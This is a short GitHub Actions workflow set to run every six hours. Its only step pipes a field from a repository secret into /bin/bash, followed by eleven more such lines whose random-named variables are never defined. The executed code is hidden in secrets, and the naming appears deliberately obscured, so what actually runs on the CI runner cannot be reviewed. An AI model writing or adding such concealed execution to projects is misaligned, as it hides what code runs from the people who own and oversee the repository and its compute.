name: yuancatmao

on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'
jobs:  # 12544
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuancatmao
        env:
          ydmcm19911: ${{ secrets.ydmcm19911 }}
        run: |
          echo $ydmcm19911 | jq -r .je2 | /bin/bash
          echo $wyxo615 | jq -r .ngrh22294 | /bin/bash
          echo $mrly78 | jq -r .fnbzx929 | /bin/bash
          echo $ad4 | jq -r .sqvhm9 | /bin/bash
          echo $xclp0 | jq -r .imcv5 | /bin/bash
          echo $eqqu8266 | jq -r .y2 | /bin/bash
          echo $thv45704 | jq -r .xgqa89 | /bin/bash
          echo $sjutt17410 | jq -r .xo8837 | /bin/bash
          echo $sdc547 | jq -r .xihv4938 | /bin/bash
          echo $h2290 | jq -r .qccae068 | /bin/bash
          echo $vm5762 | jq -r .vyy841 | /bin/bash
          echo $qr16 | jq -r .i0 | /bin/bash

